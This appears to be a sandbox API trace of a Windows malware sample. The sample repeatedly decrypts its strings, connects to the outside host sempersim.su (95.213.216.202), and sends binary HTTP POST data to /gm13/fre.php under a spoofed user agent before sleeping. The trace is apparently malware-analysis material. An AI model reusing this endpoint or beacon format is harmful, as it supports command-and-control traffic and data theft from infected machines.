[0151.232] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0151.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.243] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0151.286] GetProcessHeap () returned 0x620000 [0151.286] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0151.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.291] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0151.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.292] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0151.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.296] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0151.296] GetProcessHeap () returned 0x620000 [0151.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0151.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.301] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643200, pdwDataLen=0x19fcfc | out: pbData=0x643200, pdwDataLen=0x19fcfc) returned 1 [0151.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.307] CryptDestroyKey (hKey=0x62d190) returned 1 [0151.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.308] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0151.308] GetProcessHeap () returned 0x620000 [0151.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0151.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0151.313] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0151.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0151.314] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0151.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0151.315] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0151.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0151.316] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0151.316] GetProcessHeap () returned 0x620000 [0151.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0151.329] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0151.330] GetProcessHeap () returned 0x620000 [0151.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0151.333] GetProcessHeap () returned 0x620000 [0151.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0151.333] GetProcessHeap () returned 0x620000 [0151.333] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643200 | out: hHeap=0x620000) returned 1 [0151.334] GetProcessHeap () returned 0x620000 [0151.334] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642f30 [0151.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.335] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0151.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.346] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0151.353] GetProcessHeap () returned 0x620000 [0151.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0151.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.357] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0151.357] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.358] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0151.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.359] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0151.359] GetProcessHeap () returned 0x620000 [0151.359] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0151.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.360] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642f30, pdwDataLen=0x19fcfc | out: pbData=0x642f30, pdwDataLen=0x19fcfc) returned 1 [0151.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.361] CryptDestroyKey (hKey=0x62d190) returned 1 [0151.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0151.362] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0151.362] GetProcessHeap () returned 0x620000 [0151.362] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0151.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0151.363] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0151.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0151.364] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0151.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0151.365] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0151.365] GetProcessHeap () returned 0x620000 [0151.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0151.365] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x643e78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0151.368] GetProcessHeap () returned 0x620000 [0151.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b640 [0151.369] socket (af=2, type=1, protocol=6) returned 0x2f8 [0151.369] connect (s=0x2f8, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0151.421] FreeAddrInfoW (pAddrInfo=0x643e78*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0151.421] GetProcessHeap () returned 0x620000 [0151.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0151.421] GetProcessHeap () returned 0x620000 [0151.421] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0151.422] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0151.423] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0151.423] GetProcessHeap () returned 0x620000 [0151.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0151.423] GetProcessHeap () returned 0x620000 [0151.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0151.423] GetProcessHeap () returned 0x620000 [0151.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6435a8 [0151.423] GetProcessHeap () returned 0x620000 [0151.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0151.424] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0151.425] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0151.425] GetProcessHeap () returned 0x620000 [0151.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0151.425] GetProcessHeap () returned 0x620000 [0151.426] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0151.426] send (s=0x2f8, buf=0x63a880*, len=237, flags=0) returned 237 [0151.426] send (s=0x2f8, buf=0x6421e0*, len=159, flags=0) returned 159 [0151.426] GetProcessHeap () returned 0x620000 [0151.426] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0151.426] recv (in: s=0x2f8, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0153.150] GetProcessHeap () returned 0x620000 [0153.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0153.150] GetProcessHeap () returned 0x620000 [0153.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435a8 | out: hHeap=0x620000) returned 1 [0153.151] GetProcessHeap () returned 0x620000 [0153.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0153.151] GetProcessHeap () returned 0x620000 [0153.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0153.151] closesocket (s=0x2f8) returned 0 [0153.152] GetProcessHeap () returned 0x620000 [0153.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b640 | out: hHeap=0x620000) returned 1 [0153.152] GetProcessHeap () returned 0x620000 [0153.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0153.153] GetProcessHeap () returned 0x620000 [0153.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f30 | out: hHeap=0x620000) returned 1 [0153.153] GetProcessHeap () returned 0x620000 [0153.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0153.162] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x12c8) returned 0x2f8 [0153.167] Sleep (dwMilliseconds=0xea60) [0153.189] GetProcessHeap () returned 0x620000 [0153.189] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643008 [0153.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.190] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0153.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.202] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0153.210] GetProcessHeap () returned 0x620000 [0153.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fd8 [0153.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.211] CryptImportKey (in: hProv=0x63bcb0, pbData=0x638fd8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0153.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.212] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0153.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.213] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0153.213] GetProcessHeap () returned 0x620000 [0153.213] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0153.214] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.217] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643008, pdwDataLen=0x19fcfc | out: pbData=0x643008, pdwDataLen=0x19fcfc) returned 1 [0153.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.217] CryptDestroyKey (hKey=0x62d710) returned 1 [0153.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.218] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0153.218] GetProcessHeap () returned 0x620000 [0153.218] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0153.219] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0153.219] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0153.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0153.220] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0153.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0153.221] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0153.221] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0153.221] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0153.221] GetProcessHeap () returned 0x620000 [0153.221] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0153.222] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0153.222] GetProcessHeap () returned 0x620000 [0153.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0153.223] GetProcessHeap () returned 0x620000 [0153.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0153.223] GetProcessHeap () returned 0x620000 [0153.223] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643008 | out: hHeap=0x620000) returned 1 [0153.223] GetProcessHeap () returned 0x620000 [0153.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642f78 [0153.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.224] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0153.231] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.231] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0153.237] GetProcessHeap () returned 0x620000 [0153.237] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0153.238] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.238] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0153.239] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.239] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0153.240] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.240] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0153.240] GetProcessHeap () returned 0x620000 [0153.240] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0153.241] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.241] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642f78, pdwDataLen=0x19fcfc | out: pbData=0x642f78, pdwDataLen=0x19fcfc) returned 1 [0153.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.242] CryptDestroyKey (hKey=0x62d190) returned 1 [0153.242] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0153.243] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0153.243] GetProcessHeap () returned 0x620000 [0153.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0153.243] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0153.243] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0153.244] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0153.244] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0153.245] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0153.245] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0153.245] GetProcessHeap () returned 0x620000 [0153.245] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0153.245] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644350*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec40*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0153.251] GetProcessHeap () returned 0x620000 [0153.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b6a0 [0153.251] socket (af=2, type=1, protocol=6) returned 0x2fc [0153.251] connect (s=0x2fc, name=0x63ec40*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0153.317] FreeAddrInfoW (pAddrInfo=0x644350*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec40*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0153.317] GetProcessHeap () returned 0x620000 [0153.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0153.317] GetProcessHeap () returned 0x620000 [0153.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0153.317] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0153.318] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0153.318] GetProcessHeap () returned 0x620000 [0153.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0153.318] GetProcessHeap () returned 0x620000 [0153.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0153.319] GetProcessHeap () returned 0x620000 [0153.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6430e0 [0153.319] GetProcessHeap () returned 0x620000 [0153.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0153.320] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0153.320] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0153.320] GetProcessHeap () returned 0x620000 [0153.320] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0153.320] GetProcessHeap () returned 0x620000 [0153.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0153.321] send (s=0x2fc, buf=0x63a880*, len=237, flags=0) returned 237 [0153.322] send (s=0x2fc, buf=0x6421e0*, len=159, flags=0) returned 159 [0153.322] GetProcessHeap () returned 0x620000 [0153.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0153.322] recv (in: s=0x2fc, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0155.028] GetProcessHeap () returned 0x620000 [0155.028] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0155.029] GetProcessHeap () returned 0x620000 [0155.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0155.029] GetProcessHeap () returned 0x620000 [0155.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0155.029] GetProcessHeap () returned 0x620000 [0155.029] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0155.029] closesocket (s=0x2fc) returned 0 [0155.030] GetProcessHeap () returned 0x620000 [0155.030] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b6a0 | out: hHeap=0x620000) returned 1 [0155.030] GetProcessHeap () returned 0x620000 [0155.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0155.031] GetProcessHeap () returned 0x620000 [0155.031] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f78 | out: hHeap=0x620000) returned 1 [0155.031] GetProcessHeap () returned 0x620000 [0155.032] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0155.032] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1324) returned 0x2fc [0155.034] Sleep (dwMilliseconds=0xea60) [0155.045] GetProcessHeap () returned 0x620000 [0155.045] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642d80 [0155.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.046] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0155.052] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.052] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0155.064] GetProcessHeap () returned 0x620000 [0155.064] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0155.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.065] CryptImportKey (in: hProv=0x63bcb0, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0155.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.066] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0155.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.067] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0155.067] GetProcessHeap () returned 0x620000 [0155.067] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0155.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0155.068] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642d80, pdwDataLen=0x19fcfc | out: pbData=0x642d80, pdwDataLen=0x19fcfc) returned 1 [0155.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 